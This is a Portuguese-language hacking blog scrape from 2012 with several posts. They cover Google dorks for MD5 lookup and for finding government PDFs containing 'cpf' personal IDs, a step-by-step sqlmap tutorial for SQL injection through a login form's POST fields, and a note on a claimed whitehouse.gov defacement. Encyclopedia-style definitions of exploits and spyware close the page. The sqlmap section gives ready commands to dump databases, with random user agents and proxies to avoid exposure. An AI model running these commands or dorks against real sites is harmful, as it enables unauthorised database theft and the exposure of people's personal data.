    *Pesquisa MD5 e outras criptografia.
    Muito simples: "ff9830c42660c1dd1942844f8069b74a"
    link: https://www.google.com.br/search?q="ff9830c42660c1dd1942844f8069b74a"
    Pequisar site que são relacionados ao assunto md5 ou criptografia:

    pesquise pelo termo:decrypt md5

    *Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".
    Vamos pesquisa apostilas

    "Determinar o assunto depois a extenção" ext:pdf

    "cpf" ext:pdf
    ou
    "cpf" filetype:pdf

    Agora vamos combinar com o operador site: que vai determinar o site o domínio especifico da pesquisa.

    site:gov.br "cpf" ext:pdf
    ou
    site:gov.br "cpf" filetype:pdf

    Vamos restringir mais pois gov.br sera referente a muito subdomínios vamos nos focar governo de São Paulo.

    site:sp.gov.br "cpf" ext:pdf
    ou
    site:sp.gov.br "cpf" filetype:pdf

    Mundando foco da pesquisa busca de apostilas para estudos.
    "Vamos tirar o termo site pois queremos pegar apostilas independente do domínio."

    "Introdução php" ext:pdf
    ou
    "Introdução php" filetype:pdf

    Mudando a palavra php para MYSQL ou C#,PERL sua pesquisa fica dinâmica.


    A pesquisa é isso um pouco de operador é um pouco de necessidade.

    By:Cleiton Pinheiro

    Referencias:
    http://www.google.com/intl/pt-br/insidesearch/tipstricks/something-to-do.html
    http://blog.inurl.com.br/2011/01/o-que-e-string.html

    sexta-feira, 21 de dezembro de 2012

    COMANDOS - SQLMAP Injetando via POST.

    sqlmap de uma forma diferente

    COMANDOS   -   SQLMAP Injetando via POST.


    COMANDOS   -   SQLMAP Injetando via POST.

    sqlmap.py --url *************** --current-db
    sqlmap.py --url *************** -D 'databasedosite' --tables
    sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump


    ANALISANDO DADOS PARA O ATAQUE VIA POST

    Vamos ao agora enviar via post.
    Exemplo uma tela de login e senha!, como injetar com sqlmap ??
    alvo:http://www.pagina.com.br/login.phpUrl para onde é enviado os posts usuario e senha, como saber qual url. 
    Abra o codigo fonte e veja analise o fonte


    <form  action="validar/lt.php" method="post"  >
    <input type="text" name="login">
    <input type="text" name="senha">
    </form>

    No caso para onde é enviado os posts "campos login e senha".

    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
    #2* e #1* Indica que são campos posts e os mesmo devem ser injetados


    DEIXANDO SEU AGENT HTTP RANDÔMICO
    Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agent http://en.wikipedia.org/wiki/User_agentEX:
    Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
    A cada requisição ele vai mudar seu user agent:
    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent


    SETANDO PROXY
    Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"
    ex:
    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"

    MODELO 2 DE INJETAR SQL VIA POST
    Agora vamos utilizar a segunda forma de injetar via post.Lendo um arquivo de requisição post via sqlmap, com o comando "-r"Precisamos criar arquivo com o nome fica sua escolha configurado devidamente.Ex:

      POST http://www.pagina.com.br/validar/ls.php HTTP/1.1
      Host: www.pagina.com.br
      Origin: http://www.pagina.com.br/
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.54.16 (KHTML, like Gecko) Version/5.1.4 Safari/534.54.16
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOMD4054CXIAin1BB
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Referer:  http://www.pagina.com.br/login.php
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      Cookie: PHPSESSID=ea4b4f69b0ed5e611b0d1b5ff5c7e9f9;
      Pragma: no-cache
      Connection: keep-alive
      Proxy-Connection: keep-alive
      Content-Length: 468

      ------WebKitFormBoundaryOMD4054CXIAin1BB
      Content-Disposition: form-data; name="login#1*"

      admin
      ------WebKitFormBoundaryMDad4054CXIAin1BB
      Content-Disposition: form-data; name="senha#1*"

      1234

    depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
    ../sqlmap.py -r post.txt --dbs --random-agent --proxy="SEU PROXY:PORTA"


    "Conhecimento livre & Com responsabilidade"

    quinta-feira, 20 de dezembro de 2012

    Momento Wikipédia! O QUE É UM EXPLOIT ?????

    O QUE É UM EXPLOIT ?????
    Momento Wikipédia!
    O QUE É UM EXPLOIT ?????

    Um exploit, em segurança da informação, é um programa de computador, uma porção de dados ou uma sequência de comandos que se aproveita das vulnerabilidades de um sistema computacional – como o próprio sistema operativo ou serviços de interação de protocolos (ex: servidores Web). São geralmente elaborados por hackers como programas de demonstração das vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso não autorizado a sistemas. Por isso muitos crackers não publicam seus exploits, conhecidos como 0days, e o seu uso massificado deve-se aos script kiddies.

    Até meados dos anos 1990, acreditava-se que os exploits exploravam exclusivamente problemas em aplicações e serviços para plataformas Unix. A partir do final da década, especialistas demonstraram a capacidade de explorar vulnerabilidades em plataformas de uso massivo, por exemplo, sistemas operacionais Win32 (Windows 9x, NT, 2000 e XP). Como exemplo temos o CodeRed, o MyDoom, o Sasser em 2004 e o Zotob em 2005.
    Como atua

    Para um exploit atacar, o sistema precisa ter uma vulnerabilidade, ou seja, um meio de comunicação com a rede que possa ser usado para entrar, uma porta ou um console.

    Um exploit muito usado é no sistema RPC do Windows:

    o usuário localiza a porta e envia à porta RPC uma sequência de bytes, que são interpretados como dados pelo servidor
    quando são recebidos, estes dados deixam propositadamente o sistema em pane
    o sistema passa o controle a estes próprios dados que então são uma sequência de ordem para dominar a CPU.

    Desta forma esta sequência de informações toma conta do PC e abre-o para o hacker que aguarda na outra ponta.

    No sistema Linux, quando existem vulnerabilidades, sempre são publicadas, como já houve no sistema Apache, Samba ou MySQL, que também apresentam vulnerabilidades e possibilita o controle do PC por um hacker remoto.

    segunda-feira, 17 de dezembro de 2012

    Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts

    Informativo 


    Informativo invasão www.whitehouse.gov, grupo Cyb3rGh0sts




    Grupo de hacker invadem servidores:

    www.whitehouse.gov

    Nome do grupo: Cyb3rGh0sts

    By: Crlo Lvd & Syztem Schmelzer
    Cyb3rGh0sts & AnonCyber

    INFORMAÇÕES CAPTURADAS

    Momento Wikipédia o que é Spyware ?



    Spyware consiste em um programa automático de computador, que recolhe informações sobre o usuário, sobre os seus costumes na Internet e transmite essa informação a uma entidade externa na Internet, sem o seu conhecimento nem o seu consentimento.
    Diferem dos cavalos de Tróia por não terem como objetivo que o sistema do usuário seja dominado, seja manipulado, por uma entidade externa, por um cracker.
    Os spywares podem ser desenvolvidos por firmas comerciais, que desejam monitorar o hábito dos usuários para avaliar seus costumes e vender este dados pela internet. Desta forma, estas firmas costumam produzir inúmeras variantes de seus programas-espiões, aperfeiçoando-o, dificultando em muito a sua remoção.
    Por outro lado, muitos vírus transportam spywares, que visam roubar certos dados confidenciais dos usuários. Roubam dados bancários, montam e enviam registros das atividades do usuário, roubam determinados arquivos ou outros documentos pessoais.
    Com frequência, os spywares costumavam vir legalmente embutidos em algum programa que fosse shareware ou freeware. Sua remoção era por vezes, feita quando da compra do software ou de uma versão mais completa e paga.
    Traduzindo ao pé da letra, Spyware significa "aplicativo ou programa espião".

    Adwares

    Muitas vezes usa-se de forma genérica o termo spyware para os malware e adwares, que são programas indesejáveis. Costuma-se incluir os adwares no estudo dos spywares, pois assemelham-se na sua forma de infecção e na sua forma de desinstalação. Seriam como se fossem um sub-grupo dos spywares.
    Os adwares são conhecidos por trazerem na tela do usuário algum tipo de propaganda.
    Como geralmente são firmas comerciais que os desenvolvem, é comum os adwares virem embutidos em diversos programas de livre download (freeware), com a autorização de seus autores.
    O Kazaa oficial é um programa de compartilhamento de arquivos, sendo um exemplo do casamento de um software gratuito com adwares, pois estes lhe proporcionam uma fonte de renda.
    Inicialmente os adwares procuravam exibir propagandas em janelas, chamados de banners, pequenas janelas de propagandas, embutidas em softwares de terceiros. Caso o usuário gostasse deste software, poderia adquirir uma versão mais avançada, paga, livre destas propagandas.
    Posteriormente os adwares passaram a monitorar a atividade do usuário na internet, podendo desta forma mostrar propagandas personalizadas, além de enviar dados sobre hábitos do usuário a certos sites, tendo então funções de spyware e adware, de forma simultânea.
    Mais adiante certos adwares passaram a exibir janela do tipo pop-up, pequena janela de propaganda solta pela tela, em vez de banners.
    Um pouco mais a frente os adwares passaram a se instalar no navegador do usuário, acrescentando certas funcionalidades duvidosas, principalmente no Internet Explorer. Avanços (ou upgrades) no Internet Explorer, passaram a exigir o consentimento do usuário para a sua instalação.
    Porém com o passar do tempo, os adwares sofisticaram-se, incluindo propagandas persistentes, com inúmeras variantes, onde a sua desinstalação passou a ser um tarefa bastante penosa ou mesmo impossível, sem uma ajuda externa. A insistência no aparecimento das propagandas e sua difícil desinstalação, levaram os usuários a classificá-los como pragas ou spywares e não mais como simples adwares.
    Certos adwares passaram a ser instalados no Internet Explorer, quando o usuário navegava em sites maliciosos.
    Os adwares se sofisticaram, tornaram-se pragas. Produzem alterações no registro do Windows e depois somem ou se escondem para garantir que as alterações não sejam desfeitas, exigindo então não mais a ação de um antivírus ou de um simples anti-spyware, mas sim de um programa específico de conserto do registro.
    Por vezes os adwares exibem propagandas pornográficas, falsas propagandas de infecção do sistema por vírus, falsa propaganda de venda de produtos e passaram também a causar instabilidade no sistema, principalmente no navegador.
    Suspeita-se que possam tornar o sistema do usuário aberto a ação de crackers,devido a falta de maiores cuidados na elaboração dos adwares.
    Sua data de descoberta é desconhecida.